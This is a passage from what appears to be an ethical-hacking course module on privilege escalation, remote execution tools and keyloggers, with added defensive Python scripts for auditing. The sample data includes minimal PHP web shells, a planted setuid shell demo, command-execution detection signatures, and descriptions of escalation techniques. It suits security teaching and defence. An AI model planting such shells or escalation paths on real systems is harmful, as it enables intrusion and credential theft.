Many public vulnerability repositories are available online that provide information about various software vulnerabilities. Attackers search for an exploit matching the target's OS and software application on exploit sites such as SecurityFocus (http://www.securityfocus.com) and Exploit Database (https://www.exploit-db.com), and use that exploit to gain higher privileges.


Privilege Escalation using Spectre and Meltdown Vulnerabilities

Spectre and Meltdown are CPU vulnerabilities, disclosed in January 2018, that stem from the design of modern processors including chips from AMD, ARM, and Intel. They are side effects of performance optimizations: branch prediction, out-of-order execution, speculative execution, and caching interact in a way that lets an unprivileged process infer the contents of memory it is not allowed to read, because the processor's privilege checks are applied only after the speculative work has left traces in the cache. Attackers use them to steal secrets such as login credentials and cryptographic keys from other processes or from the kernel; the vulnerabilities do not themselves grant higher privileges, but the stolen secrets can then be used to escalate. Because the flaws are in the hardware, they affect most operating systems, servers, PCs, cloud systems, and mobile devices that run on the affected processors.

■ Spectre Vulnerability

Spectre affects many modern processors, including those from Apple, AMD, ARM, Intel, Samsung, and Qualcomm. It tricks the processor into speculatively executing instructions that read data the program should not be allowed to read. Processors speculate to finish work faster: when the outcome of a conditional branch is not yet known, the processor predicts it and executes ahead along the predicted path; if the prediction turns out wrong the results are discarded, but the cache lines those instructions touched remain loaded, and their presence can be measured with timing. Attackers exploit this in two main ways:

o Bounds check bypass (Variant 1, CVE-2017-5753): the processor is trained to speculatively execute an array read before the bounds check completes. The out-of-bounds value is never returned to the program, but it is used to touch a cache line that the attacker can later detect, so the attacker reads memory outside the array.

o Branch target injection (Variant 2, CVE-2017-5715): for indirect branches the processor uses branch prediction to choose a target to execute speculatively. An attacker who poisons the predictor from another context can make the victim speculatively execute a code sequence of the attacker's choosing (a "gadget") that leaks data the attacker is not entitled to.

Attackers may use Spectre to read memory in the address space of the victim process and access information for which they are not authorized, for example credentials stored by the browser, and in some configurations kernel memory. Because JavaScript in a web page can contain a Spectre gadget, the attack can also be mounted from a website against other data in the same browser process, which is why browsers reduced timer precision and moved to site isolation.

■ Meltdown Vulnerability

Meltdown affects most Intel processors released since 1995 (Itanium and pre-2013 Atom excepted), some ARM cores, and the ARM-based processors Apple used in its iOS devices. It exploits the fact that the processor checks a load's access permission only after speculatively executing the instructions that depend on the loaded value. The attacker's code reads a kernel address, which is not permitted from user mode. Before the processor delivers the resulting fault, it has already speculatively used the loaded byte to index into an attacker-controlled array, pulling one specific line of that array into the cache. The faulting instruction and everything after it are discarded and the process receives an exception (which it catches), but the cache line stays loaded. The attacker then times reads of every line of the array; the fast one reveals the byte that was read. Repeating this over successive addresses dumps kernel memory and, through the kernel's direct mapping of physical memory, most of the memory of the machine.

Attackers use this to escalate privileges indirectly: an unprivileged process reads kernel and physical memory and recovers critical data such as credentials, private keys, or the password hashes of other users. The software mitigation, kernel page-table isolation (KPTI, also called KAISER), unmaps kernel memory from user-mode page tables so that there is nothing for the speculative read to reach. On Linux a practitioner can check a host's mitigation status for each of these issues in the files under /sys/devices/system/cpu/vulnerabilities/.



Other Privilege Escalation Techniques

■ Access Token Manipulation

In Windows operating system, access tokens are used to determine the security context of a process or thread. These tokens include the access profile (identity and privileges) of a user associated with a process. After a user is authenticated, the system produces an access token. Every process the user executes makes use of this access token. The system verifies this access token when a process is accessing a secured object. 


A process that holds the required privileges (notably SeDebugPrivilege, SeImpersonatePrivilege, or SeAssignPrimaryTokenPrivilege, which administrators and many service accounts hold) can duplicate another process's token or start a new process under it, so that the new process runs in the security context of a different user than the one who started it. Windows exposes the same mechanism legitimately: an administrator who logs on as a standard user runs administrative tools under another account with the "runas" command, which creates a process with that account's token. Attackers abuse the underlying APIs (OpenProcessToken, DuplicateTokenEx, ImpersonateLoggedOnUser, CreateProcessWithTokenW) to steal the tokens of higher-privileged users, for example SYSTEM from a service process, or to create processes under them, escalating privileges while the activity appears to belong to the impersonated account.

■   Application Shimming

The Windows operating system uses the Windows Application Compatibility Framework, called Shim, to keep programs written for older versions of Windows working on newer ones. For example, application shimming allows a program created for Windows XP to run on Windows 10. A shim is a layer placed between the program and the operating system: when a program starts, the loader consults the shim database to determine whether any shims apply to it, and if so the shim engine uses API hooking to redirect the program's calls to the operating system through the shim. The default shim database shipped with Windows is %WINDIR%\AppPatch\sysmain.sdb. Custom databases are installed with sdbinst.exe, which copies them to %WINDIR%\AppPatch\Custom (and Custom64 for 64-bit programs) and registers them under

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB

together with a per-program entry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom.

Shims run in user mode and cannot modify the kernel. Some built-in shims can be abused: RedirectEXE redirects execution to another binary (used in older UAC bypasses), InjectDll loads an attacker's DLL into the shimmed process, and GetProcAddress-style shims intercept a program's address lookups so that its API calls can be redirected. Installing a shim database requires administrator rights, so attackers typically use shimming after an initial elevation, for defense evasion and persistence: disabling Windows Defender, elevating from programs that run with higher privileges, installing backdoors, and so on. Defenders should monitor execution of sdbinst.exe and changes to the registry keys above, and review any custom .sdb files present in %WINDIR%\AppPatch\Custom.

■    File System Permissions Weakness

Many processes in Windows execute other binaries automatically as part of their functionality. If the file system permissions on such a binary, or on the directory that contains it, allow an ordinary user to modify it, the binary can be replaced with a malicious file that the legitimate process then executes. If the process that launches the binary has higher privileges, the replacement runs with those privileges, which may include SYSTEM. Attackers use this technique against Windows service binaries (a service whose executable is writable by Users runs the attacker's code as the service account the next time it starts) and against self-extracting installers that unpack and run files from a user-writable location. The check is simple: list the services and their binaries, then inspect the permissions on each binary and its directory with icacls.

■    Path Interception

Path interception is a method of placing an executable in a particular location in such a way that an application or service executes it in place of the legitimate target. Attackers exploit several flaws and misconfigurations to achieve this: unquoted paths (in service definitions and shortcuts), PATH environment variable misconfiguration (a writable directory early in PATH, or a PATH entry that does not exist but can be created), and search order hijacking as described above for DLLs. Path interception gives the attacker persistence and, when the calling process runs with higher privileges, privilege escalation.
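The unquoted service path case above can be checked mechanically. The following Python script is an added example, not code from the original module or from any product it names: given the ImagePath values that "sc qc <service>" or Get-CimInstance Win32_Service return for each service (the three sample entries and their vendor names here are constructed), it lists, in the order Windows tries them, the bogus executables that CreateProcess would pick up, and on a Windows host reports which of those locations the current account can write to.

```python
import os
import re
from typing import Dict, List

# Constructed sample ImagePath values, in the form "sc qc <service>" or
# Get-CimInstance Win32_Service | Select-Object Name, PathName report them.
# The service and vendor names are made up for this example.
SAMPLE_IMAGE_PATHS: Dict[str, str] = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\svc.exe" -k netsvcs',
    "BadSvc": r"C:\Program Files\Bad Vendor\Agent Service\agent.exe --service",
    "SysSvc": r"C:\Windows\System32\svchost.exe -k LocalService",
}

# In an unquoted ImagePath the executable ends at the first ".exe" that is
# followed by whitespace (or the end of the string); the rest is arguments.
_EXE_RE = re.compile(r"(?i)^(.*?\.exe)(?:\s|$)")


def hijack_candidates(image_path: str) -> List[str]:
    r"""Return, in the order Windows tries them, the bogus executables that an
    unquoted, space-containing ImagePath lets CreateProcess pick up.

    For C:\Program Files\Bad Vendor\Agent Service\agent.exe Windows tries
    C:\Program.exe, then C:\Program Files\Bad.exe, then
    C:\Program Files\Bad Vendor\Agent.exe, before the real binary.
    A quoted path, or a path without spaces, yields no candidates.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    m = _EXE_RE.match(path)
    exe = m.group(1) if m else path
    if " " not in exe:
        return []
    tokens = exe.split(" ")
    # Every prefix except the full path is a place an attacker could plant a binary.
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def writable_locations(candidates: List[str]) -> List[str]:
    """Candidates whose parent directory the current account can write to.
    Only meaningful on the Windows host being assessed; elsewhere it returns
    nothing rather than guessing."""
    if os.name != "nt":
        return []
    return [c for c in candidates if os.access(os.path.dirname(c), os.W_OK)]


def audit(image_paths: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each service with an unquoted, space-containing path to its candidates."""
    findings: Dict[str, List[str]] = {}
    for name, image_path in image_paths.items():
        candidates = hijack_candidates(image_path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for name, candidates in audit(SAMPLE_IMAGE_PATHS).items():
        writable = set(writable_locations(candidates))
        print(f"{name}: unquoted path, CreateProcess would try:")
        for c in candidates:
            print(f"  {c}  [{'WRITABLE' if c in writable else 'not writable by this account'}]")
```

Run it on the assessed host after replacing SAMPLE_IMAGE_PATHS with the real service list. Any candidate reported as writable is a working escalation path for whoever can write there: the attacker drops a binary with that name and waits for the service to restart (or restarts it, if the service permissions allow). The fix is to quote the path in the service definition, for example with sc config <service> binPath= "<quoted path>".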

■   Scheduled Task

The Windows operating system includes the utilities 'at' (deprecated, but still present on older systems) and 'schtasks'. A user with administrator privileges can use these utilities, and the Task Scheduler service behind them, to schedule programs or scripts to run at a particular date and time, at logon, at startup, or in response to an event; a task created by an administrator can be configured to run as SYSTEM. With valid credentials a task can also be created on a remote system over RPC. Attackers use scheduled tasks to execute malicious programs at system startup, maintain persistence, execute code remotely, and escalate privileges by having a task run their binary as SYSTEM.

■    Launch Daemon

When macOS (formerly OS X) boots, launchd runs to complete system initialization. launchd loads the parameters of each launch-on-demand system-level daemon from the property list (plist) files in /System/Library/LaunchDaemons and /Library/LaunchDaemons; each plist names an executable that runs at boot, as root. An attacker with root access can create and install a new launch daemon by dropping a plist into /Library/LaunchDaemons and loading it with launchctl. Where an existing daemon's plist or executable is writable by less privileged users, the attacker can instead alter the existing daemon's executable so that his/her code runs as root at every boot, which provides both persistence and privilege escalation.

■    Plist Modification

In macOS and OS X, plist (property list) files hold the configuration needed by applications and services: when a program should execute, the path to its executable, its arguments, the permissions it needs, and so on. The plist files that control launchd jobs are stored in system-wide locations such as /Library/LaunchDaemons and /Library/LaunchAgents (loaded as root, or for every user who logs in) and in per-user locations such as ~/Library/LaunchAgents (loaded with that user's privileges); application preferences live in /Library/Preferences and ~/Library/Preferences. Where an attacker can write to these files, he/she can change the executable path or arguments so that malicious code runs on behalf of a legitimate user or as root, which serves both as a persistence mechanism and as a route to privilege escalation.

■   Setuid and Setgid

In Linux and macOS, if an application has the setuid or setgid bit set, it executes with the privileges of the owning user or group respectively, rather than those of the user who launched it. Normally applications run with the current user's privileges; setuid and setgid exist for the cases where a program must perform a privileged operation on behalf of an unprivileged user, such as passwd updating /etc/shadow. Every such binary is therefore a privilege boundary, and an attacker looks for ones that are vulnerable (buffer overflows, unsafe handling of environment variables, calling other programs through a relative path) or simply misconfigured (a shell, an editor or an interpreter with setuid set) to execute code with elevated privileges. Enumerating them is a standard first step: find / -type f -perm -4000 -ls lists setuid files, and -perm -2000 lists setgid files.
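Enumerating setuid and setgid binaries and comparing them with a known-good baseline is the first thing both an attacker and an auditor do on a Unix host. The Python script below is an added example, not part of the original module: it walks the file system as an ordinary user, reports every regular file with either bit set, and lists the ones a baseline does not account for. The BASELINE set is an assumption for illustration; on a real engagement it comes from a clean install of the same OS release. The demo() function plants a setuid file in a scratch directory (constructed input) to show a positive result without touching the real system.

```python
import os
import shutil
import stat
import tempfile
from typing import FrozenSet, Iterator, List, Tuple


def elevated_bits(mode: int) -> str:
    """Name the elevation bits set in an st_mode value: 'setuid', 'setgid',
    'setuid,setgid', or '' when neither is set."""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    return ",".join(flags)


def find_elevated(root: str) -> Iterator[Tuple[str, str, int]]:
    """Walk `root` and yield (path, flags, owner uid) for every regular file
    with setuid or setgid set. Symlinks are not followed and unreadable
    directories are skipped, so this is safe to run as an ordinary user.
    Equivalent shell: find ROOT -type f \\( -perm -4000 -o -perm -2000 \\) -ls"""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            flags = elevated_bits(st.st_mode)
            if flags:
                yield path, flags, st.st_uid


# Assumed baseline: the setuid/setgid files expected on this (hypothetical)
# build. A real baseline is taken from a clean image of the same OS release.
BASELINE: FrozenSet[str] = frozenset({
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
})


def unexpected(found: Iterator[Tuple[str, str, int]],
               baseline: FrozenSet[str]) -> List[Tuple[str, str, int]]:
    """Everything elevated that the baseline does not account for. A root-owned
    setuid file in /tmp, a home directory or a web root is the classic sign of
    a planted privilege-escalation backdoor."""
    return [entry for entry in found if entry[0] not in baseline]


def demo() -> List[Tuple[str, str, int]]:
    """Plant a setuid file in a scratch directory (constructed input) and return
    what the scan reports for that directory; the directory is removed afterwards."""
    scratch = tempfile.mkdtemp(prefix="suidscan-")
    try:
        planted = os.path.join(scratch, "shell")
        with open(planted, "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/sh\n")
        os.chmod(planted, 0o4755)  # the owner may set setuid on a file they own
        return unexpected(find_elevated(scratch), BASELINE)
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


if __name__ == "__main__":
    for path, flags, uid in unexpected(find_elevated("/"), BASELINE):
        print(f"{flags:14} uid={uid:<6} {path}")
```

Note that the setuid bit on a shell script is ignored by Linux, so the planted file in demo() is only a marker for the scanner; the real risk is a setuid ELF binary, and the scanner treats both the same because the bit, not the content, is what it is looking for.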

■    Web Shell

A web shell is a script placed on a web server that gives the attacker remote command execution through the web server itself. Web shells can be written for any server platform (Windows, Linux, macOS and OS X) in whatever language the server runs (PHP, ASP.NET, JSP, Perl). Attackers upload or inject a web shell, for example through an unrestricted file upload or a file inclusion flaw, to maintain persistent access and to use the server as a foothold for controlling it remotely. A web shell runs with the privileges of the web server process (www-data, an IIS application pool identity, and so on), so the attacker next exploits local vulnerabilities on the server to escalate. After escalating privileges, an attacker can install malicious software, change user permissions, add or remove users, steal credentials, read emails, and so on.
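Because a web shell runs with the web server's privileges, defenders hunt for it on disk rather than waiting for the escalation that follows. The Python scanner below is an added example, not code from the original module: it applies a few signatures that characterise PHP web shells (a command-execution function fed directly from a request parameter, eval of a request parameter, eval of a decoded or decompressed string) and flags any PHP file sitting in a directory that the application is only supposed to write data into. The SAMPLE_WEBROOT contents, including the two minimal shells, are constructed for this example and are not samples from any real incident.

```python
import re
from typing import Dict, List, Pattern, Tuple

# Constructed snapshot of a PHP web root: path -> file contents.
SAMPLE_WEBROOT: Dict[str, str] = {
    "/var/www/html/index.php": "<?php\necho 'Hello';\ninclude 'header.php';\n",
    "/var/www/html/lib/util.php": "<?php function shell_escape($s) { return escapeshellarg($s); }\n",
    "/var/www/html/uploads/avatar.php": (
        "<?php if (isset($_REQUEST['c'])) { echo '<pre>'; system($_REQUEST['c']); echo '</pre>'; } ?>"
    ),
    "/var/www/html/cache/.x.php": "<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>\n",
}

# Directories the application normally writes data into; PHP source
# appearing there is a finding on its own.
WRITABLE_DIRS = ("/uploads/", "/cache/", "/tmp/")

SIGNATURES: List[Tuple[str, Pattern[str]]] = [
    ("command-exec-from-request",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("eval-of-request",
     re.compile(r"\beval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("eval-of-obfuscated-string",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
]


def scan_source(src: str) -> List[str]:
    """Names of the signatures that match one PHP source string."""
    return [name for name, rx in SIGNATURES if rx.search(src)]


def scan_webroot(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Path -> findings for every file that matches a signature or is PHP in a data directory."""
    findings: Dict[str, List[str]] = {}
    for path, src in files.items():
        hits = scan_source(src)
        if path.endswith(".php") and any(d in path for d in WRITABLE_DIRS):
            hits.append("php-in-writable-dir")
        if hits:
            findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_webroot(SAMPLE_WEBROOT).items():
        print(f"{path}: {', '.join(hits)}")
```

Signature scanning catches the common, lazily obfuscated shells; a determined attacker splits the dangerous call across variables or uses a less obvious function, so pair it with file-integrity monitoring of the web root and with web server logs showing POST requests to files that were never part of the deployment.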



How to Defend Against Privilege Escalation

The best countermeasure against privilege escalation is to ensure that users have the least privileges needed to do their work. Then, even if an attacker succeeds in gaining access to a low-privileged account, he/she cannot use it directly to obtain administrative access. Often, flaws in program code allow such escalation on a target system. As stated earlier, an attacker can enter the network with a non-administrative account and then work up to the higher privileges of an administrator.

The following are the best countermeasures to defend against privilege escalation:

■    Restrict the interactive logon privileges

■    Use encryption technique to protect sensitive data

■    Run users and applications with the least privileges

■    Reduce the amount of code that runs with particular privilege

■    Implement multi-factor authentication and authorization

■    Perform debugging using bounds checkers and stress tests

■    Run services as unprivileged accounts

■   Test operating system and application coding errors and bugs thoroughly

■    Implement a privilege separation methodology to limit the scope of programming errors and bugs

■    Patch and update the kernel regularly

■    Change UAC settings to "Always Notify", so that it increases the visibility of the user when UAC elevation is requested

■ Restrict users from writing files to the search paths for applications 

■ Continuously monitor file system permissions using auditing tools

■    Reduce the privileges of user accounts and groups so that only legitimate administrators can make service changes

■    Use whitelisting tools to identify and block malicious software that changes file, directory, and service permissions

■    Use fully qualified paths when loading libraries and executables in Windows applications

■    Ensure that all executables are placed in write-protected directories

■    In macOS, prevent plist files from being altered by users by making them read-only

■    Block unwanted system utilities or software that may be used to schedule tasks 

■    Patch and update the web servers regularly

■    Disable the default local administrator account


Executing Applications

Once attackers have obtained higher privileges on the target system through the privilege escalation techniques above, they execute applications on it; this stage is often called "owning" the system. The malicious applications may be run locally or pushed to the victim's machine remotely, and they serve to gather information that leads to further exploitation or loss of privacy, gain unauthorized access to system resources, crack passwords, capture screenshots, install a backdoor to maintain easy access, and so on.

The malicious programs attackers execute on target systems can be:

■    Backdoors- Programs that bypass normal authentication to give the attacker covert, repeatable remote access to the system, through which he/she can gather information that leads to exploitation or loss of privacy and gain unauthorized access to system resources.

■    Crackers- Piece of software or program designed for cracking a code or passwords.

■    Keyloggers- This can be hardware or a software type. In either case, the objective is to record each keystroke made on the computer keyboard.

■ Spyware- Spy software may capture the screenshots and send them to a specified location defined by the hacker. To this purpose, attackers have to maintain access to victims' computers. After deriving all the requisite information from the victim's computer, the attacker installs several backdoors to maintain easy access to it in the future.  

Tools for Executing Applications

Tools for executing applications remotely help attackers perform various malicious activities on target systems. After gaining administrative privileges, attackers use these tools to install, execute, delete, and/or modify restricted resources on the victim machine.

■ RemoteExec

Source: https://www.isdecisions.com

RemoteExec remotely installs applications, executes programs/scripts, and updates files and folders on Windows systems throughout the network. It allows an attacker to modify the registry, change local admin passwords, disable local accounts, and copy/update/delete files and folders.

RemoteExec can perform the following activities remotely.

o Remote MSI package Installation: RemoteExec can remotely deploy applications developed using .msi format to a number of Windows systems by specifying the path of .msi file that the attacker wants to deploy, and then choosing the action (install/uninstall/repair/update) to perform.

o Remote Execution: RemoteExec allows remote execution of programs (.exe, .bat, .cmd), scripts (.vbs, .js) and files associated with executables (.txt, .doc, .wav, .reg, .inf, .msi, etc.).

o Registry Modification: RemoteExec allows the remote modification of the registry on all Windows systems throughout the network, or of a specific subset of computers. You just have to indicate the path to the .reg, select the target systems and launch with a click.

o  File  Operations:  RemoteExec  allows  copying,  updating,  or  deleting  files  and  folders on Windows systems throughout the network.

o Password and Local Account Management: RemoteExec allows remotely changing the Local Administrator Password and disabling all other local accounts to reinforce security.

o Interaction with Remote Systems: RemoteExec enables you to remotely power off, reboot or shutdown systems, wake up computers equipped with Wake-On-LAN technology, and lock or close user sessions.

Some other tools for executing applications remotely are listed below:

■    PDQ Deploy (https://www.pdq.com)

■    Dameware Remote Support (https://www.dameware.com)

■    ManageEngine Desktop Central (https://www.manageengine.com) 

■    PsExec (https://docs.microsoft.com)

■   TheFatRat (https://github.com)


Keylogger

Keyloggers are software programs or hardware devices that record the keys struck on a computer keyboard (keystroke logging) on an individual computer or across a network of computers. Whoever installs the device or program can later review every keystroke the victim typed. A keylogger records almost every keystroke and saves the recorded information to a text file or sends it elsewhere. Because keyloggers hide their processes and interface, the target is unaware of the logging. Offices and industries use keyloggers to monitor employees' computer activity, and parents use them at home to monitor children's Internet activity.

A keylogger combined with spyware transmits the captured information to an unknown third party. Attackers use keyloggers illegally to steal sensitive and confidential information about victims: email IDs, passwords, banking details, chat room and IRC activity, instant messages, and bank account and credit card numbers. Data sent over an encrypted Internet connection is just as exposed, because the keylogger captures the keystrokes before the application encrypts anything.

The keylogger program is installed on the user's system invisibly, through email attachments or through "drive-by" downloads when users visit certain websites. Hardware keystroke loggers sit between the keyboard and the computer, below the operating system, so that they record every keystroke while remaining invisible to software running on the host.

A keylogger can:

■    Record every keystroke typed on the user's keyboard

■    Capture screenshots at regular intervals, showing user activity such as typed characters or clicked mouse buttons

■   Track the activities of users by logging Window titles, names of launched applications, and other information

■    Monitor online activity of users by recording addresses of the websites visited and with keywords entered

■    Record all the login names, bank and credit card numbers, and passwords, including hidden passwords or data displayed in asterisks or blank spaces

■    Record online chat conversations

■    Make unauthorized copies of both outgoing and incoming email messages


Types of Keystroke Loggers

A keylogger is a hardware device or software program that secretly records each keystroke on the user's keyboard. Keyloggers save captured keystrokes to a file for later reading or transmit them to a place where the attacker can access them. Because they record everything entered through the keyboard, they capture passwords, credit card numbers, email addresses, names, addresses, and phone numbers. Keyloggers capture information before it is encrypted, which gives the attacker access to passphrases and other "well-hidden" information.

There are two types of keystroke loggers: hardware key loggers and software key loggers. Both these keyloggers help attackers to record all keystrokes entered on the target system.

■ Hardware Keystroke Loggers

Hardware keyloggers are small devices that look like normal USB drives or cable adapters. Attackers connect them between the keyboard plug and the computer's USB socket, and every keystroke the user types is stored in the unit. Attackers later retrieve the unit to read the stored keystrokes. The primary advantage of these loggers is that no antispyware, antivirus, or desktop security program running on the host can detect them, because they never touch the host's software. Their disadvantage is that their physical presence is easy to discover.

Hardware keystroke loggers are of three main types:

■    PC/BIOS Embedded

BIOS-level firmware that manages keyboard input can be modified so that it captures the keystrokes typed. This requires physical and/or admin-level access to the target computer.


■    Keylogger Keyboard

A hardware circuit attached to the keyboard cable connector, or built into the keyboard itself, captures the keystrokes and records them to its own internal memory, which is read out later. The main advantages of a hardware keylogger over a software keylogger are that it is independent of the operating system, does not interfere with any applications running on the target computer, and cannot be discovered by anti-keylogger software on the host; only a physical inspection, or in some cases the USB device inventory, reveals it.

■    External Keylogger

External keyloggers are attached between a standard PC keyboard and the computer and record each keystroke. They need no software and work with any PC. The attacker attaches one to the target computer and later reviews the recorded keystrokes on his/her own machine. There are four types of external keyloggers:

• PS/2 and USB Keylogger: Completely transparent to computer operation and requires no software or drivers for the functionality. Record all the keystrokes typed by the user on the computer keyboard, and store data such as emails, chat records, applications used, IMs, and so on.

• Acoustic/CAM Keylogger: Acoustic keyloggers do not touch the keyboard cable at all. They infer keystrokes from the sound each key makes when pressed, using a microphone and signal analysis; the related electromagnetic keyloggers pick up the emanations of a wired keyboard with a receiver. A CAM keylogger is simply a camera positioned to record the keyboard as the user types.

• Bluetooth Keylogger: Requires physical access to the target computer only once, at the time of installation. After installation on the target PC, it stores all the keystrokes and you can retrieve the keystroke information in real time by connecting via a Bluetooth device.

• Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, it features remote access over the Internet. This wireless keylogger will connect to a local Wi-Fi Access Point, and send E-mails containing recorded keystroke data. You can also connect to the keylogger at any time over TCP/IP and view the captured log.

■ Software Keystroke Loggers

These loggers are software installed on a target system, remotely over the network or through an email attachment, to record all keystrokes. The logged information is stored as a log file on the computer's hard drive, and the logger periodically sends the log to the attacker, typically over email or HTTP. Software loggers often gather additional data as well (window titles, clipboard contents, screenshots), because they are not limited by the fixed memory of a hardware keystroke logger.
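What a software keylogger's log file looks like, and how an incident responder turns it back into the text the victim actually submitted, is best shown on a sample. The Python code below is an added example, not from the original module or from any keylogger product; the log format (one timestamped line per key or per window change, special keys in angle brackets) and the log contents are constructed for this illustration. The replay applies BackSpace and Tab so that the result is exactly what the application received, which for the login window is a username and password that TLS never had the chance to protect.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of a software keylogger's output file. The format is an
# assumption for this example; real loggers differ, but all record one event per key.
SAMPLE_LOG = """\
[2024-03-01 09:12:03] WINDOW: Login - Mozilla Firefox
[2024-03-01 09:12:05] KEY: a
[2024-03-01 09:12:05] KEY: l
[2024-03-01 09:12:05] KEY: i
[2024-03-01 09:12:06] KEY: c
[2024-03-01 09:12:06] KEY: e
[2024-03-01 09:12:06] KEY: <Tab>
[2024-03-01 09:12:07] KEY: S
[2024-03-01 09:12:07] KEY: 3
[2024-03-01 09:12:08] KEY: c
[2024-03-01 09:12:08] KEY: r
[2024-03-01 09:12:08] KEY: e
[2024-03-01 09:12:09] KEY: t
[2024-03-01 09:12:09] KEY: 1
[2024-03-01 09:12:10] KEY: <BackSpace>
[2024-03-01 09:12:10] KEY: !
[2024-03-01 09:12:11] KEY: <Return>
[2024-03-01 09:13:40] WINDOW: Terminal
[2024-03-01 09:13:41] KEY: l
[2024-03-01 09:13:41] KEY: s
[2024-03-01 09:13:41] KEY: <Space>
[2024-03-01 09:13:42] KEY: -
[2024-03-01 09:13:42] KEY: l
[2024-03-01 09:13:42] KEY: a
[2024-03-01 09:13:43] KEY: <Return>
"""

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] (?P<kind>WINDOW|KEY): (?P<payload>.*)$")


def reconstruct(log: str) -> Dict[str, List[List[str]]]:
    """Replay a keystroke log and return, per window title, the lines the user
    submitted, each split into the fields that Tab separated. BackSpace edits
    are applied, so the output is what the victim sent, not the raw key sequence."""
    result: Dict[str, List[List[str]]] = {}
    window = "<unknown>"
    fields: List[str] = [""]
    for raw in log.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # tolerate truncated or corrupted lines
        kind, payload = m.group("kind"), m.group("payload")
        if kind == "WINDOW":
            window = payload
            fields = [""]
        elif payload == "<Return>":
            result.setdefault(window, []).append(fields)
            fields = [""]
        elif payload == "<Tab>":
            fields.append("")
        elif payload == "<BackSpace>":
            if fields[-1]:
                fields[-1] = fields[-1][:-1]
            elif len(fields) > 1:
                fields.pop()
        elif payload == "<Space>":
            fields[-1] += " "
        elif payload.startswith("<") and payload.endswith(">"):
            pass  # modifier keys such as <Shift> carry no text of their own
        else:
            fields[-1] += payload
    return result


def likely_credentials(replayed: Dict[str, List[List[str]]]) -> List[Tuple[str, str, str]]:
    """(window, username, password) for submissions that look like a login form:
    a window whose title mentions login or sign-in, submitted as exactly two fields."""
    hits: List[Tuple[str, str, str]] = []
    for window, lines in replayed.items():
        if re.search(r"log ?in|sign ?in", window, re.IGNORECASE):
            for fields in lines:
                if len(fields) == 2:
                    hits.append((window, fields[0], fields[1]))
    return hits


if __name__ == "__main__":
    for window, user, password in likely_credentials(reconstruct(SAMPLE_LOG)):
        print(f"{window}: user={user!r} password={password!r}")
```

The same replay, run over a recovered log during an incident, tells the responder which accounts must have their passwords rotated and which commands the attacker watched being typed, which is the exposure assessment that a raw keystroke dump does not give directly.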

There are four types of software keystroke loggers:


■   Application Keylogger

An application keylogger is a user-mode program that hooks keyboard input (on Windows typically through SetWindowsHookEx with a low-level keyboard hook) and records everything the user types in email, chat, and other applications, including passwords; most also log Internet activity. It runs invisibly and, in a monitored office, can be deployed to every machine on the network.

■    Kernel/Rootkit/Device Driver Keylogger

Attackers rarely use kernel keyloggers because they are difficult to write and require a high level of proficiency from the developer. These keyloggers run at the kernel level and are consequently difficult to detect, especially for user-mode applications. A kernel keylogger acts as a keyboard device driver, or as a filter driver layered above the real keyboard driver, and thus sees every keystroke before any application does.

A rootkit-based keylogger is a malicious Windows device driver that records all keystrokes while using rootkit techniques to hide its driver, files, and log from the system. It is hard to detect with standard tools, although kernel-level anti-rootkit checks and, on 64-bit Windows, driver signature enforcement raise the bar for installing one.

The device driver keylogger replaces or wraps the existing keyboard I/O driver with one that embeds the keylogging functionality. It saves all keystrokes performed on the computer into a hidden log file and then sends the file to its destination over the Internet.

■    Hypervisor-based Keylogger

A hypervisor-based keylogger runs inside a malicious hypervisor installed beneath the operating system, so that the original OS runs as a guest virtual machine. The hypervisor intercepts keyboard I/O before the guest sees it, which places the keylogger entirely outside the view of the security software running in the OS.

■    Form Grabbing Based Keylogger

A form-grabbing keylogger records the contents of web forms and submits them to the attacker over the Internet. It captures the data in the browser before the browser encrypts it for HTTPS, typically by hooking the browser's form-submission (Submit event) handling, so TLS offers no protection against it.



Hardware Keyloggers

Let us examine the details of external hardware keyloggers. As earlier discussed, there are various types of external hardware keyloggers available in the market. These keyloggers are plugged in-line, between a computer keyboard and a computer. These types of keyloggers include:

■ PS/2 key logger 

■ USB keylogger

■ Wi-Fi keylogger 

■      Keylogger embedded inside the keyboard 

■     Bluetooth keylogger

■    Hardware keylogger



These keyloggers monitor and capture the keystrokes of the target system. Because external keyloggers sit between a standard PC keyboard and the computer and record each keystroke in hardware, anti-keylogger software installed on the target system cannot detect them. However, a user can easily detect their physical presence.

There are various hardware keylogger manufacturers and vendors, some of which are discussed below.

■    KeyGrabber

Source: https://www.keydemon.com

The KeyGrabber hardware keylogger is an electronic device that captures keystrokes from a PS/2 or USB keyboard. The product line includes several types of external hardware keyloggers, such as KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.

Some of the hardware keyloggers are listed below:

■    KeyCarbon (http://www.keycarbon.com)

■    KeyLlama Keylogger (https://Keyllama.com)

■    Keyboard logger (https://www.detective-store.com) 

■    KeyGhost (http://www.keyghost.com)

■ KeyCobra (http://www.keycobra.com) 

■ KEYKatcher (https://keykatcher.com)